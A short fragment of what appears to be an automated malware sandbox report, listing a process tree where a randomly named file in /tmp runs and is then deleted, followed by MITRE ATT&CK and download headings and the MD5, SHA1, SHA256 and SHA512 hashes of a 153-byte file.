/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97